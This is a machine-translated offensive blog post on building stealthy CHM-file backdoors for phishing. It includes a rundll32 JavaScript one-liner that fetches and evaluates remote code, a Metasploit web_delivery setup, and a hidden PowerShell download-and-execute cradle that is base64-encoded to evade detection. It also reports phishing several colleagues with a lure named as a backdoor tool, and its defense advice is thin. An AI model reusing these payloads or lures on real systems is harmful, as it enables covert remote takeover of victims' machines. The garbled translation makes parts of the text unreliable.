Talking about advanced combination technology to create a perfect webshell
0x00 Introduction
I have previously written an article about Client phishing: Using powershell Client for effective phishing, in the process of using each Client for testing, I personally find that the CHM file is the best one to use, but its disadvantage is that it will pop up a black box, which will be noticed by attackers. So how can we prevent him from playing the black box? That's what this article will introduce ~
0x01 CHM Introduction
Before introducing how to use CHM as a backdoor, you must first know what CMH is.
CHM (Compiled Help Manual) is the "Compiled Help file ". It is a new-generation Help File Format of Microsoft. It uses HTML as the source file to compile and store the Help content in a database-like format. CHM supports Javas ghost, VBs ghost, ActiveX, Java Applet, Flash, common graphics files (GIF, JPEG, PNG), audio and video files (MID, WAV, AVI), etc, the URL can be associated with the Internet. Because of its ease of use, various forms are also used as the e-book format.
0x02 CHM Production
There are many ways to create CHM. There are multiple tools available for use, so I will not detail them here. In this test, EasyCHM is used to create a CHM file, which is very simple to use.
Create the following directory. The file content is random:
Open EasyCHM and choose new> browse. Select the directory. Default file type:
Click OK to view the preview CHM file:
Select compile to compile the CHM File.
0x03 CHM Execute Command
[Email protected] A demo is sent on twitter and run the calculator through CHM:
The Code is as follows:
#!html
Command exec <Script> x. Click (); </script>
Write the above Code into html, place it in the project directory for compilation, generate a CHM File, run this file, and bring up a calculator:
0x04 clear the bullet box
Some students who have tested nishang Out-CHM found that the CHM file generated during running will see a clear pop-up box. Like this:
One night, I suddenly had a brain hole. I thought of a good way to keep him blank, that is, using JavaScript Backdoor. After the test, the meterpreter session is obtained without a dialog box. In this test, a modified python version of JSRat. ps1 is used. The address is MyJSRat. For details about the usage, see readme.
The complete test process is as follows:
1. Combined with CHM + JSBackdoor
Use the JSRat server in interactive mode:
#!bashpython MyJSRat.py -i 192.168.1.101 -p 8080
Attackers can access http: // 192.168.1.101: 8080/wtf to obtain the attack code as follows:
#!bashrundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WinHttp.WinHttpRequest.5.1");h.Open("GET","http://192.168.1.101:8080/connect",false);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
After multiple tests, the preceding command is successfully written to chm, and its Html code is:
#!html
This is a demo!
<Script> x. Click (); </script>
Run the program after compilation. You can obtain the JS Interactive shell successfully:
If you directly execute cmd/c command, there will be a black box. You can use run to avoid displaying a black box. After running the run Command, enter whoami> e: \ 1.txt and read it to obtain the echo.
2. Get the meterpreter session
In this test, the meterpreter session is obtained directly by running the powershell command. After obtaining the client JS interactive shell, the system automatically runs the powershell command to obtain the meterpreter session. The procedure is as follows:
Enable MSF web_delivery:
#!bash ~ msfconsole -Lqmsf > use exploit/multi/script/web_deliverymsf exploit(web_delivery) > set target 2target => 2msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcppayload => windows/meterpreter/reverse_tcpmsf exploit(web_delivery) > set lhost 192.168.1.101lhost => 192.168.1.101msf exploit(web_delivery) > set lport 6666lport => 6666msf exploit(web_delivery) > set SRVPORT 8081SRVPORT => 8081msf exploit(web_delivery) > set uripath /uripath => /msf exploit(web_delivery) > exploit[*] Exploit running as background job.msf exploit(web_delivery) >[*] Started reverse TCP handler on 192.168.1.101:6666[*] Using URL: http://0.0.0.0:8081/[*] Local IP: http://192.168.1.101:8081/[*] Server started.[*] Run the following command on the target machine:powershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
The client with powershell can obtain the meterpreter session by executing the following command:
#!bashpowershell.exe -nop -w hidden -c $n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
Because of the existence of special tokens, we can save the following code to power.txt In the base64 format:
#!bash$n=new-object net.webclient;$n.proxy=[Net.WebRequest]::GetSystemWebProxy();$n.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $n.downloadstring('http://192.168.1.101:8081/');
Run the following command:
#!bashcat power.txt | iconv --to-code UTF-16LE |base64
The powershell command to be executed is:
#!bashpowershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA==
Run the following command to directly obtain the meterpreter session:
#!bashpython MyJSRat.py -i 192.168.1.101 -p 8080 -c "powershell -ep bypass -enc IAAkAG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AAoAIAAkAG4ALgBwAHIAbwB4AHkAPQBbAE4AZQB0AC4AVwBlAGIAUgBlAHEAdQBlAHMAdABdADoAOgBHAGUAdABTAHkAcwB0AGUAbQBXAGUAYgBQAHIAbwB4AHkAKAApADsACgAgACQAbgAuAFAAcgBvAHgAeQAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9AFsATgBlAHQALgBDAHIAZQBkAGUAbgB0AGkAYQBsAEMAYQBjAGgAZQBdADoAOgBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA7AAoAIABJAEUAWAAgACQAbgAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADkAMgAuADEANgA4AC4AMQAuADEAMAAxADoAOAAwADgAMQAvACcAKQA7AA=="
During the test, from running CHM to obtaining meterpreter, there is no obvious exception on the client, and there is no black box in the whole process. The obtained meterpreter session is as follows:
3. Are you killed?
Many people may ask if they will be killed. The following is the result of virscan's killing:
Http://r.virscan.org/report/6173ee9c62d29806bb84035a8f1738ba
0x05 application scenarios
A graph description (Let me guess if you want to click it ):
Note: If you have found several vulnerabilities and used tools to modify the file name, it does not mean that the tool shared by the original author has a problem.
0x06 actual test
It is to create a chm file using the above method and name it an attractive name. For example, in the company's Technology Group, a name named "create no-kill backdoor. the actual test results of the chm file are as follows:
The meterpreter session of multiple people is obtained successfully.
0x07 defense
At present, I have not found any defense posture. You can share it with anyone you know. It is best to improve personal security awareness. pay more attention to this type of files and try not to mess with them. If not, you can put them in a virtual machine. Using procexp.exe, you can see that the chm file with a backdoor will start a new process:
How can we trace the source of this backdoor? In fact, chm can be decompiled into html. You can decompile hh.exe with windows. The command is as follows:
#! BashC: \ Users \ evi1cg \ Desktop> hh-decompile test poc. chm # test is the test folder of the current directory.
The execution result is as follows:
0x08 Summary
This test is to combine some known attack techniques. The result is that the bundled backdoor is more concealed and almost "perfect". What is lacking in the test is that the file will be stuck for a short time when it is enabled. Sometimes the combination of small vulnerabilities can cause major hazards, and the combination of small methods can also cause major killers. In the spirit of sharing, I hope that my friends will be able to avoid harm.